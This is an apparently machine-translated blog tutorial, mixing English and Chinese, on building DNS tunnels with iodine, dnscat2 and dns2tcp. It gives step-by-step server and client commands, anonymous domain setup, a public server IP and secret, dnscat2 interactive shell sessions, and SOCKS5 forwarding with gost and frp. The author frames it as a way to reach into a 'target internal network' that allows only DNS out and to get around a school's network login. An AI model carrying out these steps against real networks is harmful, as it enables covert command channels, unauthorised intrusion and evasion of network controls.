1. DNS tunnel preparation
When I was looking at a site with my buddies, I found that it was not connected to the Internet, but the site could do DNS queries, so I thought about building a DNS tunnel.
This article is for readers to see more clearly, my public network server and domain name are not coded, I hope you will be merciful.
1. DNS tunnel introduction
DNS tunnel is a kind of tunnel technology. When our upper-layer protocols such as HTTP and HTTPS, and forward and reverse port forwarding all fail, we can try to use DNS tunneling. DNS tunneling is difficult to prevent, because whether it is normal business or use, it is inevitable that the DNS protocol will be used for resolution, so most firewalls allow DNS traffic. At this time, if we construct a malicious domain name (***.xxx.ga) on a machine that is not connected to the Internet, and the local DNS server cannot give an answer, it will locate the queried domain name through the Internet in an iterative query manner. Authoritative DNS server. In the end, this DNS request will fall on the malicious DNS server we built in advance, so our hosts that do not go online communicate with the malicious DNS server.
Tools for building DNS tunnels currently include iodine, dnscat, dns2tcp, etc.
I am currently using the iodine tool to build.
2. Preliminary preparation
1 domain name, 1 public network server
Need to apply for a domain name (preferably anonymous, recommended application website Freenom - a name that everyone is familiar with ), free and anonymous.
When applying, directly bring the suffix to apply, otherwise the domain name will be displayed as unavailable (for example: jingbao123.ga).
After the application is completed, it is recommended to change the domain name server of freenom to Tencent dnspod. It is more convenient to manage the domain name and configure NS resolution. I did not find the NS record for freenom.
dnspod: https://www.dnspod.cn, add the newly applied domain name in dnspod, and then dnspod will give two dns server addresses,
Change the dns server in freenom to the address provided by dnspod, and then the resolution right of the domain name can be directed to dnspod.
After dnspod gets the management right of the domain name, add two resolution records in it.
The first class A record tells the domain name system that the IP address of "www.woshishui120.ga" is "121.xxx.xxx.xxx"
The second NS record tells the domain name system that the domain name of "ns.woshishui120.ga" is resolved by "www.woshishui120.ga".
So far, the preparatory work has been completed, and the domain name has been bound to our public network server.
Two.iodine DNS tunnel construction
Install iodine on our public network server, the tool server is iodined, and the client is iodine.
Executing the apt install iodine command will install the server and client at the same time.
1. Server
Deploy the iodine server on the public network server. (requires root privileges to run)
iodined -f -c -P 123.com 192.168.200.1 ns.woshishui120.ga -DD
\-f:在前台运行\-c:禁止检查所有传入请求的客户端IP地址。\-P:客户端和服务端之间用于验证身份的密码。\-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。
这里的192.168.200.1为自定义局域网虚拟IP地址,建议不要与现有网段冲突注意!填写的地址为NS记录
After executing this command, a dns0 virtual network card will be newly generated, and the ip address is the ip address (192.168.200.1) entered in the command just now.
**ubuntu默认53端口是打开的,通过下面命令关闭掉53端口**
rm /etc/resolv.conf&&echo "nameserver x.x.x.x" >> /etc/resolv.conf 配置dns服务器(x.x.x.x改为dns服务器,8.8.8.8等)
systemctl stop systemd-resolved 停止该进程
systemctl disable systemd-resolved 关闭开机自启动
2. Client
The client I use kali, kali comes with iodine tool.
iodine -f -P 123.com ns.woshishui120.ga -M 200
-r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道-M:指定上行主机的大小。-m:调节最大下行分片的大小。-f:在前台运行-T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。-O:指定数据编码规范。-P:客户端和服务端之间用于验证身份的密码。-L:指定是否开启懒惰模式,默认开启。-I:指定两个请求之间的时间间隔。
3. Pit point
After my client executes the connection command, I can’t connect live or alive (as shown in the picture above). At first I thought that my ns record hadn’t taken effect, but it still didn’t work in the afternoon when I configured it at noon. I also think that it is because of Tencent Cloud that port 53 is not available, etc., but the bosses said that port 53 is available, so I asked you for help. In the end, this article given by the boss has the answer. https://exploit0.cn/archives/571/
My public network server belongs to Tencent Cloud. At that time, I only opened the tcp53 port in the firewall management panel, but did not open the udp53 port. DNS resolution uses the udp53 port.
So I quickly opened the udp53 port of Tencent Cloud Firewall.
Then proceed to execute the above command.
It can be seen that the connection has been successful. However, an encoding error will be reported, and the tool can also specify the encoding after the boss instructed. The parameter is -O
iodine -f -P 123.com ns.woshishui120.ga -M 200 -O base64
Although coding errors will also occur, they are significantly less than before.
After the connection is successful, a virtual network card will also be generated on kali. The ip address is assigned as 192.168.200.2.
Ping the virtual address of the public network server on Kali, and if the ping is successful, it means that the DNS tunnel has been established successfully.
Now it is equivalent to generating a virtual network card between the public network server and kail, and then the two virtual network cards are interoperable.
Connect to the virtual address of kali on the public network server, and use ssh to do a dynamic port forwarding.
ssh -D 60688 [email protected]
But at this time, it is only equivalent to building a socks5 proxy tunnel on port 60688 of 192.168.200.1 on the public network server. If you want to use this tunnel locally, it will not work, because 192.168.200.1 is equivalent to an intranet address, so you cannot directly Access, so you need to forward the data on port 60688 of the virtual network card address 192.168.200.1 of the public network server to a port of the public network address of the public network server. I haven't tried this port forwarding yet (I don't know which tool would be better).
I use frp to build a reverse tunnel between two virtual network cards.
4.frp builds a tunnel
Start the server on the public network server.
Then use kali to connect, the server ip of kali connection is the ip of the virtual network card of the public network server.
Kali is displayed as follows
The public network server is displayed as follows
That is, a socks5 tunnel is successfully built on port 60688 of the public network server, which is equivalent to the socks5 tunnel being embedded in the dns tunnel.
Then you can browse Kali's intranet through port 60688 of the public network server. (but it feels stuck)
3. dnscat2 DNS tunnel construction
(1) Direct connection mode
The client directly initiates a DNS resolution request to the DNS server with the specified IP address
1. Server
Public network server as server
ruby dnscat2.rb
2. Client
dnscat --dns server=121.5.145.31,port=53 --secret=4575d232b01034db7eae9baa9ac4dbe2
Kali as the client: the command is the command output by the server (in the place circled in red in the above figure, xxxx is changed to the address of your own public network server)
I don’t know why kali can’t connect to the server in the direct connection mode (if anyone knows, please let me know)
(2) Relay mode
DNS is iteratively resolved by the Internet and points to the specified DNS server. Repeater mode is slower compared to direct mode
1. Server
Public network server as server
ruby dnscat2.rb ns.woshishui120.ga -e open --no-cache -c 123.com
-e:指定安全级别,open表示服务端运行客户端不进行加密
-c:指定密钥
--no-cache:禁止缓存,一定添加该选项,因为powershell-dnscat2客户端域dnscat2服务端的Caching模式不兼容
2. Client
kali as client
dnscat --secret=123.com ns.woshishui120.ga
Use dnscat2 to build a dns tunnel. After the build is successful, a session will be generated on the server.
After entering session 2 and executing the shell, a new session will be generated.
The new session can execute commands.
sessions 列出所有session
session -i 2 进入session 2
shell:创建交互式shell
suspend:返回上一层
listen 127.0.0.1:888 127.0.0.1:22 第一个127.0.0.1为服务端ip,第二个127.0.0.1为客户端ip,将客户端的22端口转到服务端的888端口 ssh -p 888 127.0.0.1
Four. dns2tcp DNS tunnel construction
1. Server
Public network server as server
Change the listen of the dns2tcp configuration file to 0.0.0.0, (the client can connect to the server by listening at 0.0.0.0)
After resources, you can change it by yourself, name: public network server_ip: port, and the format should follow this. The name and port can be set casually, and the public network server_ip is the public network ip of the public network server. The name is set to name, and the parameter after the client -r is followed by the set name.
dns2tcpd -f /etc/dns2tcpd.conf -F -d 2
-f /etc/dns2tcpd.conf”指定了配置文件,-F要求程序在前台运行,-d 2 指明了输出调试信息,级别为2
2. Client
kali as client
dns2tcpc -r ssh -z ns.woshishui120.ga -l 8888 -d 2 中继模式
dns2tcpc -r ssh -z ns.woshishui120.ga 121.5.145.31 -l 8888 -d 2 直连模式
-r 后接服务名称<ssh/socks中的任意一个>,该名称自己随便在服务端的配置文件dns2tcpd.conf设置,-z 后接你设置的NS记录,和你的公网服务器公网ip <公网ip> 可不填,不写将使用中继模式,否则使用直连模式中继模式像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们的恶意DNS服务器。相比直连,速度较慢,但是更安全。-l 后接本地端口,随便一个常用端口就行,8888”指明了隧道的这头监听的端口-d 开启 Debug ,"-d 2"指明了输出调试信息,级别为2,作用和服务器端相同-k 密码
This command means: connect to the ssh name of the server, accessing port 8888 of kali is equivalent to accessing port 22 of vps.
After entering this command, there will be no output from the client and server. At first, I saw no output, and thought it was not connected.
ssh ubuntu@public server -p 8888 to connect to the ssh service of the public server. (After entering this command, the server and client will have output)
If you want to access the Internet through the dns tunnel. -r specifies the socks of the server configuration file, and a forward socks5 tunnel needs to be opened on port 60688 of the server (the port is set in the configuration file of the server, socks: 121.5.145.31:60688, socks and 60688 can be set casually ), otherwise it is just that kali and the public network server communicate with each other, but kali cannot access the Internet through the public network server. When a socks5 tunnel is opened on the 60688 port of the public network server, it can communicate with the dns tunnel of the public network server through kali. Then access the Internet through the socks5 port (60688) of the public network server.
The public network server opens forward socks5, you can use gost or proxy
gost opens forward socks5 proxy
gost -L=socks5://:60688The public network server opens the forward socks5 proxy
Proxy opens forward socks5 proxy
proxy socks -t tcp -p "0.0.0.0:60688" --udp-port 0 --udp
goproxy使用:https://github.com/snail007/goproxy/blob/master/README_ZH.md
Gost or proxy can choose any one, personally feel that gost is faster
dns2tcpc -r socks -z ns.woshishui120.ga -l 8888 -d 2
At this time, you can access the Internet by visiting port 8888 of Kali.
Kali configuration proxy access Baidu
It is possible to access the Internet in an environment where only dns is out of the network.
5. Tool utilization environment
1. Outside -> Inside
The usage environment of iodine and dnscat2: the target is the internal network, and only dns is out of the network, build a dns tunnel to the target through its own public network server, so as to enter the target internal network through the public network server proxy, and roam the target internal network.
2. Inside -> Outside
The environment used by dns2tcp is: I am in an intranet, and my environment is not connected to the Internet, but dns can go out of the network, so I can use dns2tcp to build a dns tunnel, so that I can access the Internet environment.
Typical environment: After the school connects to wifi, it must be authenticated to log in, otherwise it will not be able to access the Internet, but the browser can load the login interface.
